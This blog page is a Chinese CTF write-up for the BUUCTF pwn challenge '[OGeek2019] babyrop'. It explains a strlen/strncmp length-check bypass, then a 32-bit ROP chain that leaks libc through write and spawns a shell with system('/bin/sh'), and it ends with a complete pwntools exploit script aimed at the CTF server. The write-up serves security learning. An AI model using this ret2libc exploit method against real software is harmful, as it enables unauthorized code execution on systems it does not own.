



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="清風微醺" href="https://www.wdqjxtmph.top/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="清風微醺" href="https://www.wdqjxtmph.top/atom.xml" />
<link rel="alternate" type="application/json" title="清風微醺" href="https://www.wdqjxtmph.top/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="pwn题" />


<link rel="canonical" href="https://www.wdqjxtmph.top/2021/09/03/babyrop/">



  <title>
标准32位程序ROP流程和c语言转义字符 - CTF |
Loτυs = 清風微醺 = 凌恒</title>
<meta name="generator" content="Hexo 5.4.2"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">标准32位程序ROP流程和c语言转义字符
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2021-09-03 15:03:33">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2021-09-03T15:03:33+08:00">2021-09-03</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>3.3k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>3 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Loτυs</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipewf5l51j20zk0m8b29.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipew28b65j20zk0m8hdt.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipey84bjtj20zk0m8hdt.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipeyhsblkj20zk0m81kx.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1gipeubcbajj20zk0m8h1h.jpg"></li>
          <li class="item" data-background-image="https://tva2.sinaimg.cn/large/6833939bly1giclh3brzpj20zk0m8ann.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/CTF/" itemprop="item" rel="index" title="分类于 CTF"><span itemprop="name">CTF</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://www.wdqjxtmph.top/2021/09/03/babyrop/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="Loτυs">
    <meta itemprop="description" content="凌恒, 凌恒山其若陋兮、">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="清風微醺">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p>才学习了基本的 ROP 流程，到处找题练，不过也没做出来几道题，以这道 32 位的题作为例题吧。</p>
<p>这道题是 BUUCTF 上 pwn 练习题里的 [OGeek2019] babyrop。</p>
<h1 id="代码审计"><a class="markdownIt-Anchor" href="#代码审计">#</a> 代码审计</h1>
<p>老规矩先 checksec 一下：</p>
<p><img data-src="https://tva2.sinaimg.cn/large/008qDYGVgy1gwey0cxfglj30hb03itad.jpg" alt="checksec"></p>
<p>没有 canary 保护，nx 保护开启排除 shellcode 可能性，FULL RELEO 为地址随机化。</p>
<p>观察主函数，先设定了一个闹铃，到时间就会强制退出程序，解除闹铃的方法在上一篇博客中提到过了，</p>
<p>这道题中闹铃函数依然对我们解题起不到什么干扰作用。</p>
<p><img data-src="https://tvax4.sinaimg.cn/large/008qDYGVgy1gwexwagez9j30dg08076b.jpg" alt="1"></p>
<p>主函数的思路大概是：生成一个随机数，把这个随机数作为参数传进 sub_804871F () 函数里，然后将该函数返回的结果作为参数再传进 sub_80487D0 () 里</p>
<h2 id="sub_804871f"><a class="markdownIt-Anchor" href="#sub_804871f">#</a> sub_804871F()</h2>
<p><img data-src="https://tvax4.sinaimg.cn/large/008qDYGVgy1gwexwwrkglj30c309ojv8.jpg" alt="2"></p>
<p>sprintf（）函数将生成的随机数 a1 加到了 s [32] 的数组中。这里题目有 read 函数，但是没有栈溢出的可能，读入 buf 之后，读取 buf 的长度，然后比较 buf 和 s 字符串的大小（比较长度为前 v1 个字符）。</p>
<p>此时如果 strncmp（）的结果不为 0，则直接退出程序。因此我们第一个目的：使 strncmp 结果为 0</p>
<h2 id="sub_80487d0"><a class="markdownIt-Anchor" href="#sub_80487d0">#</a> sub_80487D0（）</h2>
<p><img data-src="https://tva1.sinaimg.cn/large/008qDYGVgy1gwexx45o25j30dq06bwga.jpg" alt="3"></p>
<p>sub_804871F () 函数会将 buf [7] 作为参数传进来，将它的 ASCII 码比对，看到全程序中唯一一个存在栈溢出漏洞可能性的地方。但是必须满足 a1 的 ASCII 码值能达到栈溢出的大小。第二个目的：使 a1 的 ASCII 码值（sub_804871F () 函数里的 buf [7] 的 ASCII 码值尽量大）</p>
<h1 id="解题思路"><a class="markdownIt-Anchor" href="#解题思路">#</a> 解题思路</h1>
<p>题目中我们最终能利用的一个漏洞即为最终的栈溢出漏洞，而将题目扔进 ida 里找不到 system 函数和 /bin/sh，则明显要构造 ROP 链寻找 libc 解题了。</p>
<h2 id="first让strncmp结果为0"><a class="markdownIt-Anchor" href="#first让strncmp结果为0">#</a> First：让 strncmp 结果为 0</h2>
<p><img data-src="https://tvax4.sinaimg.cn/large/008qDYGVgy1gwexwwrkglj30c309ojv8.jpg" alt="2"></p>
<p>当 buf 与 s 数组完全相同时，strncmp 结果会为 0，但是 s 为系统生成的随机数，而 buf 是我们输入的数据，两者显然不可能相等。</p>
<p>另一种办法就是使 v1 等于 0，这样 strncmp 的结果仍为 0。</p>
<p>而 v1 是 strlen 函数读取 buf 的长度大小，使他为 0 就很简单了，标准的长度检测绕过，让 buf 数组的第一位为‘\x00’即可。此时程序不会退出。</p>
<h2 id="second让buf7的值尽可能大"><a class="markdownIt-Anchor" href="#second让buf7的值尽可能大">#</a> Second：让 buf [7] 的值尽可能大</h2>
<p>前面讲到，要实现栈溢出，buf [7] 元素的 ASCII 码值必须大于两百四十多才行。</p>
<p>ASCII 码对照表：</p>
<p><span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3d6OTQ3MzI0L2FydGljbGUvZGV0YWlscy84MDA3NjQ5Ng==">https://blog.csdn.net/wz947324/article/details/80076496</span></p>
<p>可以看出，在扩展的 ASCII 码中才有我们需要的 250 + 的 ASCII 码值，而这些字符里，如果用键盘打出来，比如 “≥” 的 ascii 码值为 242，但是在 vscode 里面可以看到，他的 ASCII 码值并没有 242</p>
<p><img data-src="https://tva4.sinaimg.cn/large/008qDYGVgy1gwexxes55qj31040rqqam.jpg" alt="4"></p>
<p>因此我们需要用到转义字符。</p>
<p><img data-src="https://tva1.sinaimg.cn/large/008qDYGVgy1gwexyqn73aj30k00fi0ze.jpg" alt="5"></p>
<p>\ 为转义字符，而’\xhh‘表示 ASCII 码值与’hh’这个十六进制数相等的符号，例如’\xff’表示 ASCII 码为 255 的符号。</p>
<p>奇怪的是，我把’\xff’和其他 ASCII 码大于 128 的符号放进 vscode，只有用 unsigned __int8 转换出来的是他们的 ASCII 码值，而用 unsigned int 和 int 转换出来的都是负数，而 ASCII 码小于 128 的就不会出现这种情况。</p>
<p><img data-src="https://tva1.sinaimg.cn/large/008qDYGVgy1gwexyypfeej31040rqwm6.jpg" alt="6"></p>
<p>我推测是这些编译器还未对扩展的 ASCII 码表进行处理。（或者涉及补码的事吧）</p>
<p>也不想深究了。</p>
<p>所以我们让 buf [7]=’\xff’就行了。综合 first 步，代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&#x27;\x00&#x27;</span>+<span class="string">&#x27;\xff&#x27;</span>*<span class="number">7</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(<span class="string">&quot;Correct\n&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>我们还要注意到，有一个让 buf [v5 - 1] = 0 的数，应该考虑该语句会不会影响到 buf [7] 的值。v5 为 read 函数返回的值，参考网上资料：read 函数返回的是读取的字节数。</p>
<p>引起我的思考，“读取的字节数” 包不包含最后的’\x00’结束符呢？用 vscode 验证：</p>
<p><img data-src="https://tvax2.sinaimg.cn/large/008qDYGVgy1gwexz6qcjkj31040rq100.jpg" alt="7"></p>
<p>答案是包含。那么我上述代码 v5 的值为 9，那么 buf [v5-1] 就未影响到 buf [7] 的值。否则我们可能就要构造</p>
<p>payload = ‘\x00’+’\xff’*8</p>
<h2 id="finallyrop"><a class="markdownIt-Anchor" href="#finallyrop">#</a> Finally:ROP!</h2>
<p>选择用 write 函数泄露 libc 地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">write_plt = elf.plt[<span class="string">&quot;write&quot;</span>]</span><br><span class="line">write_got = elf.got[<span class="string">&quot;write&quot;</span>]</span><br><span class="line">main_addr = <span class="number">0x08048825</span></span><br><span class="line">payload1 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0xe7</span>+<span class="string">b&#x27;a&#x27;</span>*<span class="number">4</span>+p32(write_plt)+p32(main_addr)+p32(<span class="number">1</span>)+p32(write_got)+p32(<span class="number">4</span>)</span><br><span class="line">r.sendline(payload1)</span><br><span class="line">write_addr = u32(r.recv(<span class="number">4</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(write_addr))</span><br></pre></td></tr></table></figure>
<h3 id="注意事项"><a class="markdownIt-Anchor" href="#注意事项">#</a> 注意事项</h3>
<p>注意点：1.32 位程序传参方式为栈传参，而 64 位程序则是优先通过寄存器传参，届时就需要用 ROPgadget 寻找 gadgets 来进行 ROP 了。</p>
<p>​                2.32 位程序里 main 函数地址不能用 elf.sym [“main”],(我也不知道为什么，谁让咱菜呢)</p>
<p>​                3.32 位程序里调用函数后需要先压返回地址，再压参数。</p>
<p><img data-src="https://tvax4.sinaimg.cn/large/008qDYGVgy1gwey04vf79j30o201yjt0.jpg" alt="8"></p>
<p>​                4.libc 题目中提供了，<span class="exturl" data-url="aHR0cDovL3huLS1saWJjLTItMjMtZnA2bi5zbw==">为 libc-2-23.so</span>，应该可以直接用，我是把他加进了 Libcsearcher 里然后再用的。</p>
<p>关于 Libcsearcher 是一个寻找 libc 的工具：具体安装教程见百度，使用教程可以在 Libcsearcher/libc-database 里的 README.md 中查看</p>
<h1 id="完整exp"><a class="markdownIt-Anchor" href="#完整exp">#</a> 完整 exp</h1>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">r = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">25501</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu共享文件夹/BUUCTF/pwnn2&#x27;</span>)</span><br><span class="line">payload = <span class="string">&#x27;\x00&#x27;</span>+<span class="string">&#x27;\xff&#x27;</span>*<span class="number">7</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(<span class="string">&quot;Correct\n&quot;</span>)</span><br><span class="line">write_plt = elf.plt[<span class="string">&quot;write&quot;</span>]</span><br><span class="line">write_got = elf.got[<span class="string">&quot;write&quot;</span>]</span><br><span class="line">main_addr = <span class="number">0x08048825</span></span><br><span class="line">payload1 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0xe7</span>+<span class="string">b&#x27;a&#x27;</span>*<span class="number">4</span>+p32(write_plt)+p32(main_addr)+p32(<span class="number">1</span>)+p32(write_got)+p32(<span class="number">4</span>)</span><br><span class="line">r.sendline(payload1)</span><br><span class="line">write_addr = u32(r.recv(<span class="number">4</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(write_addr))</span><br><span class="line">libc = LibcSearcher(<span class="string">&quot;write&quot;</span>,write_addr)</span><br><span class="line">libc_base = write_addr -  libc.dump(<span class="string">&quot;write&quot;</span>)</span><br><span class="line">system_addr = libc_base+libc.dump(<span class="string">&quot;system&quot;</span>)</span><br><span class="line">bin_sh_addr = libc_base+libc.dump(<span class="string">&quot;str_bin_sh&quot;</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(<span class="string">&quot;Correct\n&quot;</span>)</span><br><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0xe7</span>+<span class="string">b&#x27;a&#x27;</span>*<span class="number">4</span>+p32(system_addr)+p32(<span class="number">0</span>)+p32(bin_sh_addr)</span><br><span class="line">r.sendline(payload2)</span><br><span class="line">r.interactive()</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

      <div class="tags">
          <a href="/tags/pwn%E9%A2%98/" rel="tag"><i class="ic i-tag"></i> pwn题</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2021-11-14 20:18:02" itemprop="dateModified" datetime="2021-11-14T20:18:02+08:00">2021-11-14</time>
  </span>
  <span id="2021/09/03/babyrop/" class="item leancloud_visitors" data-flag-title="标准32位程序ROP流程和c语言转义字符" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="Loτυs 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="Loτυs 支付宝">
        <p>支付宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>Loτυs <i class="ic i-at"><em>@</em></i>清風微醺
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://www.wdqjxtmph.top/2021/09/03/babyrop/" title="标准32位程序ROP流程和c语言转义字符">https://www.wdqjxtmph.top/2021/09/03/babyrop/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2021/08/20/string/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva2.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gicitf0kl1j20zk0m87fe.jpg" title="攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> CTF</span>
  <h3>攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2021/09/07/Libcsearcher%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva2.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gipesng5oej20zk0m87d4.jpg" title="LibcSearcher环境配置和ubuntu更新换源问题">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> CTF</span>
  <h3>LibcSearcher环境配置和ubuntu更新换源问题</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">1.</span> <span class="toc-text"> 代码审计</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#sub_804871f"><span class="toc-number">1.1.</span> <span class="toc-text"> sub_804871F()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sub_80487d0"><span class="toc-number">1.2.</span> <span class="toc-text"> sub_80487D0（）</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="toc-number">2.</span> <span class="toc-text"> 解题思路</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#first%E8%AE%A9strncmp%E7%BB%93%E6%9E%9C%E4%B8%BA0"><span class="toc-number">2.1.</span> <span class="toc-text"> First：让 strncmp 结果为 0</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#second%E8%AE%A9buf7%E7%9A%84%E5%80%BC%E5%B0%BD%E5%8F%AF%E8%83%BD%E5%A4%A7"><span class="toc-number">2.2.</span> <span class="toc-text"> Second：让 buf [7] 的值尽可能大</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#finallyrop"><span class="toc-number">2.3.</span> <span class="toc-text"> Finally:ROP!</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9"><span class="toc-number">2.3.1.</span> <span class="toc-text"> 注意事项</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4exp"><span class="toc-number">3.</span> <span class="toc-text"> 完整 exp</span></a></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/2021/08/20/string/" rel="bookmark" title="攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解">攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解</a></li><li class="active"><a href="/2021/09/03/babyrop/" rel="bookmark" title="标准32位程序ROP流程和c语言转义字符">标准32位程序ROP流程和c语言转义字符</a></li><li><a href="/2021/09/07/Libcsearcher%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" rel="bookmark" title="LibcSearcher环境配置和ubuntu更新换源问题">LibcSearcher环境配置和ubuntu更新换源问题</a></li><li><a href="/2021/09/09/64%E4%BD%8D%E6%A0%87%E5%87%86ROP%E4%B8%8E%E5%A0%86%E6%A0%88%E5%B9%B3%E8%A1%A1/" rel="bookmark" title="标准64位程序ROP流程和堆栈平衡">标准64位程序ROP流程和堆栈平衡</a></li><li><a href="/2021/09/25/%E7%94%B5%E7%A7%91%E6%96%B0%E7%94%9F%E8%B5%9B/" rel="bookmark" title="电科新生赛">电科新生赛</a></li><li><a href="/2021/11/14/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982020-format_string/" rel="bookmark" title="格式化字符串漏洞进阶">格式化字符串漏洞进阶</a></li><li><a href="/2021/11/29/SCU%E6%96%B0%E7%94%9F%E8%B5%9B2021/" rel="bookmark" title="SCU新生赛2021 pwn wp">SCU新生赛2021 pwn wp</a></li><li><a href="/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/" rel="bookmark" title="利用realloc调整栈使one_gadget生效">利用realloc调整栈使one_gadget生效</a></li><li><a href="/2022/03/13/Tcache%20bin%E6%80%BB%E7%BB%93/" rel="bookmark" title="Tcachebin 总结">Tcachebin 总结</a></li><li><a href="/2022/04/06/wustctf2020_babyfmt/" rel="bookmark" title="wustctf2020_babyfmt">wustctf2020_babyfmt</a></li><li><a href="/2022/07/11/2022%E8%93%9D%E5%B8%BDpwn%20wp/" rel="bookmark" title="2022蓝帽pwn wp">2022蓝帽pwn wp</a></li><li><a href="/2022/07/15/DSCTF%E9%83%A8%E5%88%86wp/" rel="bookmark" title="DSCTF pwn 部分wp">DSCTF pwn 部分wp</a></li><li><a href="/2022/07/24/DASCTF7%E6%9C%88%E8%B5%8B%E8%83%BD%E8%B5%9Bpwn%20wp/" rel="bookmark" title="DASCTF7月赋能赛pwn wp">DASCTF7月赋能赛pwn wp</a></li><li><a href="/2022/08/03/2022qwb/" rel="bookmark" title="2022强网杯pwn部分wp">2022强网杯pwn部分wp</a></li><li><a href="/2022/08/17/%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A2/" rel="bookmark" title="2022巅峰极客pwn wp">2022巅峰极客pwn wp</a></li><li><a href="/2022/09/04/%E7%BE%8A%E5%9F%8E%E6%9D%AF/" rel="bookmark" title="羊城杯pwn wp">羊城杯pwn wp</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="Loτυs"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">Loτυs</p>
  <div class="description" itemprop="description">凌恒山其若陋兮、</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">19</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">3</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">6</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="/default/" rel="section"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2021/08/20/string/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2021/09/07/Libcsearcher%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/" title="分类于 CTF赛题复现">CTF赛题复现</a>
</div>

    <span><a href="/2022/12/01/hitcon-wtfshell/" title="hitcon2022-wtfshell">hitcon2022-wtfshell</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/09/07/Libcsearcher%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" title="LibcSearcher环境配置和ubuntu更新换源问题">LibcSearcher环境配置和ubuntu更新换源问题</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/08/03/2022qwb/" title="2022强网杯pwn部分wp">2022强网杯pwn部分wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/03/13/Tcache%20bin%E6%80%BB%E7%BB%93/" title="Tcachebin 总结">Tcachebin 总结</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="分类于 学习笔记">学习笔记</a>
</div>

    <span><a href="/2021/10/24/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-chunk%20overlapping/" title="堆学习-Chunk Overlapping">堆学习-Chunk Overlapping</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/09/09/64%E4%BD%8D%E6%A0%87%E5%87%86ROP%E4%B8%8E%E5%A0%86%E6%A0%88%E5%B9%B3%E8%A1%A1/" title="标准64位程序ROP流程和堆栈平衡">标准64位程序ROP流程和堆栈平衡</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/09/04/%E7%BE%8A%E5%9F%8E%E6%9D%AF/" title="羊城杯pwn wp">羊城杯pwn wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="分类于 学习笔记">学习笔记</a>
</div>

    <span><a href="/2021/10/30/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-UAF/" title="堆学习-UAF">堆学习-UAF</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/07/11/2022%E8%93%9D%E5%B8%BDpwn%20wp/" title="2022蓝帽pwn wp">2022蓝帽pwn wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

